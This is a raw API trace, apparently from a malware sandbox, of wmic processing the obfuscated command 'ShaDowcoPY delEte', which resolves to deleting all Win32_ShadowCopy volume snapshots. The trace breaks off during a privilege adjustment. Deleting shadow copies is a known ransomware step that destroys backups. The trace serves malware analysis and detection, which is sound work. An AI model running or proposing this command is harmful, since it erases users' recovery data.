[0088.891] free (_Block=0x0) [0088.891] free (_Block=0x57eb88) [0088.891] lstrlenW (lpString=" ShaDowcoPY delEte") returned 19 [0088.891] malloc (_Size=0xe) returned 0x2852078 [0088.891] lstrlenW (lpString="delEte") returned 6 [0088.891] _wcsicmp (_String1="delEte", _String2="\"NULL\"") returned 66 [0088.891] malloc (_Size=0xe) returned 0x2852090 [0088.891] malloc (_Size=0x8) returned 0x572f58 [0088.891] memmove_s (in: _Destination=0x572f58, _DestinationSize=0x4, _Source=0x573228, _SourceSize=0x4 | out: _Destination=0x572f58) returned 0x0 [0088.891] free (_Block=0x573228) [0088.891] free (_Block=0x0) [0088.891] free (_Block=0x2852078) [0088.891] malloc (_Size=0x8) returned 0x573228 [0088.891] lstrlenW (lpString="QUIT") returned 4 [0088.891] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.891] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ShaDowcoPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0088.891] lstrlenW (lpString="EXIT") returned 4 [0088.891] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.891] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ShaDowcoPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0088.892] free (_Block=0x573228) [0088.892] WbemLocator:IUnknown:AddRef (This=0x5f0828) returned 0x2 [0088.892] malloc (_Size=0x8) returned 0x573228 [0088.892] lstrlenW (lpString="/") returned 1 [0088.892] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.892] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ShaDowcoPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0088.892] lstrlenW (lpString="-") returned 1 [0088.892] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.892] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ShaDowcoPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0088.892] lstrlenW (lpString="CLASS") returned 5 [0088.892] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.892] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ShaDowcoPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0088.892] lstrlenW (lpString="PATH") returned 4 [0088.892] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.892] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ShaDowcoPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0088.892] lstrlenW (lpString="CONTEXT") returned 7 [0088.892] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.892] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ShaDowcoPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0088.892] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.892] malloc (_Size=0x16) returned 0x57eb88 [0088.892] lstrlenW (lpString="ShaDowcoPY") returned 10 [0088.892] GetCurrentThreadId () returned 0x79c [0088.892] ??0CHString@@QAE@XZ () returned 0x25f844 [0088.892] malloc (_Size=0xc) returned 0x2852078 [0088.892] malloc (_Size=0xc) returned 0x28520a8 [0088.893] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5f0828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x71c1e0 | out: ppNamespace=0x71c1e0*=0x5fd00c) returned 0x0 [0103.837] free (_Block=0x28520a8) [0103.837] free (_Block=0x2852078) [0103.837] CoSetProxyBlanket (pProxy=0x5fd00c, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0103.838] ??1CHString@@QAE@XZ () returned 0x752e0504 [0103.838] GetCurrentThreadId () returned 0x79c [0103.838] ??0CHString@@QAE@XZ () returned 0x25f7dc [0103.838] malloc (_Size=0xc) returned 0x2852078 [0103.838] malloc (_Size=0xc) returned 0x28520a8 [0103.838] malloc (_Size=0xc) returned 0x28520c0 [0103.838] malloc (_Size=0xc) returned 0x28520d8 [0103.838] SysStringLen (param_1="root\\cli") returned 0x8 [0103.839] SysStringLen (param_1="\\") returned 0x1 [0103.839] malloc (_Size=0xc) returned 0x28520f0 [0103.839] SysStringLen (param_1="root\\cli\\") returned 0x9 [0103.839] SysStringLen (param_1="ms_409") returned 0x6 [0103.839] free (_Block=0x28520d8) [0103.839] free (_Block=0x28520c0) [0103.839] free (_Block=0x28520a8) [0103.839] free (_Block=0x2852078) [0103.839] malloc (_Size=0xc) returned 0x2852078 [0103.839] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5f0828, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x71c1e4 | out: ppNamespace=0x71c1e4*=0x5fd064) returned 0x0 [0104.555] free (_Block=0x2852078) [0104.555] free (_Block=0x28520f0) [0104.555] ??1CHString@@QAE@XZ () returned 0x752e0504 [0104.555] GetCurrentThreadId () returned 0x79c [0104.555] ??0CHString@@QAE@XZ () returned 0x25f848 [0104.555] malloc (_Size=0xc) returned 0x28520f0 [0104.555] malloc (_Size=0xc) returned 0x2852078 [0104.555] malloc (_Size=0xc) returned 0x28520a8 [0104.555] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0104.555] malloc (_Size=0x3a) returned 0x57feb0 [0104.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d1f7c, cbMultiByte=-1, lpWideCharStr=0x57feb0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0104.556] free (_Block=0x57feb0) [0104.556] malloc (_Size=0xc) returned 0x28520c0 [0104.556] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0104.556] SysStringLen (param_1="ShaDowcoPY") returned 0xa [0104.556] malloc (_Size=0xc) returned 0x28520d8 [0104.556] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='ShaDowcoPY") returned 0x26 [0104.556] SysStringLen (param_1="'") returned 0x1 [0104.556] free (_Block=0x28520c0) [0104.556] free (_Block=0x28520a8) [0104.556] free (_Block=0x2852078) [0104.556] free (_Block=0x28520f0) [0104.557] IWbemServices:GetObject (in: This=0x5fd00c, strObjectPath="MSFT_CliAlias.FriendlyName='ShaDowcoPY'", lFlags=0, pCtx=0x0, ppObject=0x25f844*=0x0, ppCallResult=0x0 | out: ppObject=0x25f844*=0x609a18, ppCallResult=0x0) returned 0x0 [0104.602] malloc (_Size=0xc) returned 0x28520f0 [0104.602] IWbemClassObject:Get (in: This=0x609a18, wszName="Target", lFlags=0, pVal=0x25f804*(varType=0x0, wReserved1=0x25, wReserved2=0xe58c, wReserved3=0x70, varVal1=0xffffffff, varVal2=0x6da03c), pType=0x0, plFlavor=0x0 | out: pVal=0x25f804*(varType=0x8, wReserved1=0x25, wReserved2=0xe58c, wReserved3=0x70, varVal1="Select * from Win32_ShadowCopy", varVal2=0x6da03c), pType=0x0, plFlavor=0x0) returned 0x0 [0104.602] free (_Block=0x28520f0) [0104.602] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0104.603] malloc (_Size=0x3e) returned 0x57feb0 [0104.603] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0104.603] malloc (_Size=0xc) returned 0x28520f0 [0104.603] IWbemClassObject:Get (in: This=0x609a18, wszName="PWhere", lFlags=0, pVal=0x25f804*(varType=0x0, wReserved1=0x25, wReserved2=0xe58c, wReserved3=0x70, varVal1=0x2e4fec, varVal2=0x6da03c), pType=0x0, plFlavor=0x0 | out: pVal=0x25f804*(varType=0x8, wReserved1=0x25, wReserved2=0xe58c, wReserved3=0x70, varVal1=" Where ID = '#'", varVal2=0x6da03c), pType=0x0, plFlavor=0x0) returned 0x0 [0104.603] free (_Block=0x28520f0) [0104.603] lstrlenW (lpString=" Where ID = '#'") returned 15 [0104.603] malloc (_Size=0x20) returned 0x57fef8 [0104.603] lstrlenW (lpString=" Where ID = '#'") returned 15 [0104.603] malloc (_Size=0xc) returned 0x28520f0 [0104.603] IWbemClassObject:Get (in: This=0x609a18, wszName="Connection", lFlags=0, pVal=0x25f804*(varType=0x0, wReserved1=0x25, wReserved2=0xe58c, wReserved3=0x70, varVal1=0x3169d4, varVal2=0x6da03c), pType=0x0, plFlavor=0x0 | out: pVal=0x25f804*(varType=0xd, wReserved1=0x25, wReserved2=0xe58c, wReserved3=0x70, varVal1=0x609dd8, varVal2=0x6da03c), pType=0x0, plFlavor=0x0) returned 0x0 [0104.605] free (_Block=0x28520f0) [0104.605] IUnknown:QueryInterface (in: This=0x609dd8, riid=0x6d6b50*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x25f83c | out: ppvObject=0x25f83c*=0x609dd8) returned 0x0 [0104.605] GetCurrentThreadId () returned 0x79c [0104.605] ??0CHString@@QAE@XZ () returned 0x25f7b8 [0104.605] malloc (_Size=0xc) returned 0x28520f0 [0104.605] IWbemClassObject:Get (in: This=0x609dd8, wszName="Namespace", lFlags=0, pVal=0x25f788*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25f788*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.605] free (_Block=0x28520f0) [0104.605] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0104.605] malloc (_Size=0x16) returned 0x57ebc8 [0104.605] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0104.605] malloc (_Size=0xc) returned 0x28520f0 [0104.605] IWbemClassObject:Get (in: This=0x609dd8, wszName="Locale", lFlags=0, pVal=0x25f788*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x32583c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25f788*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.606] free (_Block=0x28520f0) [0104.606] lstrlenW (lpString="ms_409") returned 6 [0104.606] malloc (_Size=0xe) returned 0x28520f0 [0104.606] lstrlenW (lpString="ms_409") returned 6 [0104.606] malloc (_Size=0xc) returned 0x2852078 [0104.606] IWbemClassObject:Get (in: This=0x609dd8, wszName="User", lFlags=0, pVal=0x25f788*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x32583c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25f788*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x32583c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.606] free (_Block=0x2852078) [0104.606] malloc (_Size=0xc) returned 0x2852078 [0104.606] IWbemClassObject:Get (in: This=0x609dd8, wszName="Password", lFlags=0, pVal=0x25f788*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x32583c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25f788*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x32583c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.606] free (_Block=0x2852078) [0104.606] malloc (_Size=0xc) returned 0x2852078 [0104.606] IWbemClassObject:Get (in: This=0x609dd8, wszName="Server", lFlags=0, pVal=0x25f788*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x32583c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25f788*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.606] free (_Block=0x2852078) [0104.606] lstrlenW (lpString=".") returned 1 [0104.606] malloc (_Size=0x4) returned 0x57ff20 [0104.606] lstrlenW (lpString=".") returned 1 [0104.606] malloc (_Size=0xc) returned 0x2852078 [0104.607] IWbemClassObject:Get (in: This=0x609dd8, wszName="Authority", lFlags=0, pVal=0x25f788*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x32583c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25f788*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x285, varVal1=0x32583c, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.607] free (_Block=0x2852078) [0104.607] ??1CHString@@QAE@XZ () returned 0x752e0504 [0104.607] IUnknown:Release (This=0x609dd8) returned 0x1 [0104.607] GetCurrentThreadId () returned 0x79c [0104.607] ??0CHString@@QAE@XZ () returned 0x25f7b0 [0104.607] malloc (_Size=0xc) returned 0x2852078 [0104.607] IWbemClassObject:Get (in: This=0x609a18, wszName="__RELPATH", lFlags=0, pVal=0x25f790*(varType=0x0, wReserved1=0x7506, wReserved2=0x0, wReserved3=0x5f, varVal1=0x0, varVal2=0x609dd8), pType=0x0, plFlavor=0x0 | out: pVal=0x25f790*(varType=0x8, wReserved1=0x7506, wReserved2=0x0, wReserved3=0x5f, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x609dd8), pType=0x0, plFlavor=0x0) returned 0x0 [0104.607] free (_Block=0x2852078) [0104.607] malloc (_Size=0xc) returned 0x2852078 [0104.607] GetCurrentThreadId () returned 0x79c [0104.607] ??0CHString@@QAE@XZ () returned 0x25f740 [0104.607] ??0CHString@@QAE@PBG@Z () returned 0x25f72c [0104.607] ??0CHString@@QAE@ABV0@@Z () returned 0x25f6cc [0104.608] ?Empty@CHString@@QAEXXZ () returned 0x752e0510 [0104.608] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x57ff30 [0104.608] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0104.608] ?Left@CHString@@QBE?AV1@H@Z () returned 0x25f6ac [0104.608] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x25f6b0 [0104.608] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x25f72c [0104.608] ??1CHString@@QAE@XZ () returned 0x1 [0104.608] ??1CHString@@QAE@XZ () returned 0x1 [0104.608] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x25f6a8 [0104.608] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x25f6cc [0104.608] ??1CHString@@QAE@XZ () returned 0x1 [0104.608] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x57ff98 [0104.608] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0104.608] ?Left@CHString@@QBE?AV1@H@Z () returned 0x25f6ac [0104.608] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x25f6b0 [0104.608] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x25f72c [0104.608] ??1CHString@@QAE@XZ () returned 0x1 [0104.608] ??1CHString@@QAE@XZ () returned 0x1 [0104.608] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x25f6a8 [0104.608] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x25f6cc [0104.608] ??1CHString@@QAE@XZ () returned 0x752e0504 [0104.608] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x752e0504 [0104.608] ??1CHString@@QAE@XZ () returned 0x752e0504 [0104.608] malloc (_Size=0xc) returned 0x28520a8 [0104.609] malloc (_Size=0xc) returned 0x28520c0 [0104.609] malloc (_Size=0xc) returned 0x2852108 [0104.609] malloc (_Size=0xc) returned 0x2852120 [0104.609] malloc (_Size=0xc) returned 0x2852138 [0104.609] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0104.609] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0104.609] malloc (_Size=0xc) returned 0x2852150 [0104.609] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0104.609] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0104.609] malloc (_Size=0xc) returned 0x2852168 [0104.609] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0104.609] SysStringLen (param_1="\"") returned 0x1 [0104.609] free (_Block=0x2852150) [0104.610] free (_Block=0x2852138) [0104.610] free (_Block=0x2852120) [0104.610] free (_Block=0x2852108) [0104.610] free (_Block=0x28520c0) [0104.610] free (_Block=0x28520a8) [0104.610] IWbemServices:GetObject (in: This=0x5fd064, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x25f748*=0x0, ppCallResult=0x0 | out: ppObject=0x25f748*=0x609e68, ppCallResult=0x0) returned 0x0 [0107.209] malloc (_Size=0xc) returned 0x28520a8 [0107.209] IWbemClassObject:Get (in: This=0x609e68, wszName="Text", lFlags=0, pVal=0x25f6f4*(varType=0x0, wReserved1=0x2e, wReserved2=0x3954, wReserved3=0x2e, varVal1=0x4e, varVal2=0x71c1e0), pType=0x0, plFlavor=0x0 | out: pVal=0x25f6f4*(varType=0x2008, wReserved1=0x2e, wReserved2=0x3954, wReserved3=0x2e, varVal1=0x3084b8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x318e20, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x71c1e0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.209] free (_Block=0x28520a8) [0107.209] SafeArrayGetLBound (in: psa=0x3084b8, nDim=0x1, plLbound=0x25f70c | out: plLbound=0x25f70c) returned 0x0 [0107.210] SafeArrayGetUBound (in: psa=0x3084b8, nDim=0x1, plUbound=0x25f708 | out: plUbound=0x25f708) returned 0x0 [0107.210] SafeArrayGetElement (in: psa=0x3084b8, rgIndices=0x25f76c, pv=0x25f734 | out: pv=0x25f734) returned 0x0 [0107.210] malloc (_Size=0xc) returned 0x28520a8 [0107.210] malloc (_Size=0xc) returned 0x28520c0 [0107.210] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0107.210] free (_Block=0x28520a8) [0107.210] IUnknown:Release (This=0x609e68) returned 0x0 [0107.210] free (_Block=0x2852168) [0107.210] ??1CHString@@QAE@XZ () returned 0x1 [0107.210] ??1CHString@@QAE@XZ () returned 0x752e0504 [0107.210] free (_Block=0x2852078) [0107.211] ??1CHString@@QAE@XZ () returned 0x752e0504 [0107.211] lstrlenW (lpString="Shadow copy management.") returned 23 [0107.211] malloc (_Size=0x30) returned 0x57ff30 [0107.211] lstrlenW (lpString="Shadow copy management.") returned 23 [0107.211] free (_Block=0x28520c0) [0107.211] IUnknown:Release (This=0x609a18) returned 0x0 [0107.211] free (_Block=0x28520d8) [0107.211] ??1CHString@@QAE@XZ () returned 0x752e0504 [0107.211] lstrlenW (lpString="PATH") returned 4 [0107.211] lstrlenW (lpString="delEte") returned 6 [0107.211] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0107.211] lstrlenW (lpString="WHERE") returned 5 [0107.211] lstrlenW (lpString="delEte") returned 6 [0107.212] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0107.212] lstrlenW (lpString="(") returned 1 [0107.212] lstrlenW (lpString="delEte") returned 6 [0107.212] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0107.212] lstrlenW (lpString="/") returned 1 [0107.212] lstrlenW (lpString="delEte") returned 6 [0107.212] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0107.212] lstrlenW (lpString="-") returned 1 [0107.212] lstrlenW (lpString="delEte") returned 6 [0107.212] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0107.212] malloc (_Size=0xc) returned 0x28520d8 [0107.212] lstrlenW (lpString="GET") returned 3 [0107.212] lstrlenW (lpString="delEte") returned 6 [0107.213] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0107.213] lstrlenW (lpString="LIST") returned 4 [0107.213] lstrlenW (lpString="delEte") returned 6 [0107.213] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0107.213] lstrlenW (lpString="SET") returned 3 [0107.213] lstrlenW (lpString="delEte") returned 6 [0107.213] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0107.213] lstrlenW (lpString="CREATE") returned 6 [0107.213] lstrlenW (lpString="delEte") returned 6 [0107.213] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0107.213] lstrlenW (lpString="CALL") returned 4 [0107.213] lstrlenW (lpString="delEte") returned 6 [0107.213] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0107.213] lstrlenW (lpString="ASSOC") returned 5 [0107.213] lstrlenW (lpString="delEte") returned 6 [0107.213] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0107.213] lstrlenW (lpString="DELETE") returned 6 [0107.214] lstrlenW (lpString="delEte") returned 6 [0107.214] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0107.214] free (_Block=0x28520d8) [0107.214] lstrlenW (lpString="/") returned 1 [0107.214] lstrlenW (lpString="delEte") returned 6 [0107.214] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0107.214] lstrlenW (lpString="-") returned 1 [0107.214] lstrlenW (lpString="delEte") returned 6 [0107.214] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0107.214] lstrlenW (lpString="delEte") returned 6 [0107.214] malloc (_Size=0xe) returned 0x28520d8 [0107.214] lstrlenW (lpString="delEte") returned 6 [0107.214] lstrlenW (lpString="GET") returned 3 [0107.214] lstrlenW (lpString="delEte") returned 6 [0107.215] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0107.215] lstrlenW (lpString="LIST") returned 4 [0107.215] lstrlenW (lpString="delEte") returned 6 [0107.215] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0107.215] lstrlenW (lpString="SET") returned 3 [0107.215] lstrlenW (lpString="delEte") returned 6 [0107.215] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0107.215] lstrlenW (lpString="CREATE") returned 6 [0107.215] lstrlenW (lpString="delEte") returned 6 [0107.215] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0107.215] lstrlenW (lpString="CALL") returned 4 [0107.215] lstrlenW (lpString="delEte") returned 6 [0107.215] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0107.215] lstrlenW (lpString="ASSOC") returned 5 [0107.215] lstrlenW (lpString="delEte") returned 6 [0107.215] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0107.215] lstrlenW (lpString="DELETE") returned 6 [0107.215] lstrlenW (lpString="delEte") returned 6 [0107.215] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0107.215] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.215] malloc (_Size=0x3e) returned 0x57ff68 [0107.215] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0107.215] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xdacfc39 | out: _String="Select", _Context=0xdacfc39) returned="Select" [0107.216] malloc (_Size=0xc) returned 0x28520c0 [0107.216] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xdacfc39 | out: _String=0x0, _Context=0xdacfc39) returned="*" [0107.216] lstrlenW (lpString="FROM") returned 4 [0107.216] lstrlenW (lpString="*") returned 1 [0107.216] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0107.216] malloc (_Size=0xc) returned 0x2852078 [0107.216] free (_Block=0x28520c0) [0107.216] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xdacfc39 | out: _String=0x0, _Context=0xdacfc39) returned="from" [0107.216] lstrlenW (lpString="FROM") returned 4 [0107.216] lstrlenW (lpString="from") returned 4 [0107.216] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0107.216] malloc (_Size=0xc) returned 0x28520c0 [0107.216] free (_Block=0x2852078) [0107.216] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xdacfc39 | out: _String=0x0, _Context=0xdacfc39) returned="Win32_ShadowCopy" [0107.217] malloc (_Size=0xc) returned 0x2852078 [0107.217] free (_Block=0x28520c0) [0107.217] free (_Block=0x57ff68) [0107.217] free (_Block=0x2852078) [0107.217] lstrlenW (lpString="SET") returned 3 [0107.217] lstrlenW (lpString="delEte") returned 6 [0107.217] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0107.217] lstrlenW (lpString="CREATE") returned 6 [0107.217] lstrlenW (lpString="delEte") returned 6 [0107.217] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0107.217] free (_Block=0x573228) [0107.217] malloc (_Size=0x4) returned 0x573228 [0107.217] lstrlenW (lpString="GET") returned 3 [0107.217] lstrlenW (lpString="delEte") returned 6 [0107.217] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0107.217] lstrlenW (lpString="LIST") returned 4 [0107.217] lstrlenW (lpString="delEte") returned 6 [0107.218] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0107.218] lstrlenW (lpString="ASSOC") returned 5 [0107.218] lstrlenW (lpString="delEte") returned 6 [0107.218] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delEte", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0107.218] WbemLocator:IUnknown:AddRef (This=0x5f0828) returned 0x3 [0107.218] free (_Block=0x572860) [0107.218] lstrlenW (lpString="") returned 0 [0107.218] lstrlenW (lpString="XDUWTFONO") returned 9 [0107.218] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0107.218] lstrlenW (lpString="XDUWTFONO") returned 9 [0107.218] malloc (_Size=0x14) returned 0x57ebe8 [0107.218] lstrlenW (lpString="XDUWTFONO") returned 9 [0107.218] GetCurrentThreadId () returned 0x79c [0107.218] GetCurrentProcess () returned 0xffffffff [0107.218] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x25f8b0 | out: TokenHandle=0x25f8b0*=0x298) returned 1 [0107.218] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25f8ac | out: TokenInformation=0x0, ReturnLength=0x25f8ac) returned 0 [0107.218] malloc (_Size=0x118) returned 0x2852448 [0107.218] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x2852448, TokenInformationLength=0x118, ReturnLength=0x25f8ac | out: TokenInformation=0x2852448, ReturnLength=0x25f8ac) returned 1 [0107.219] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x2852448*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), 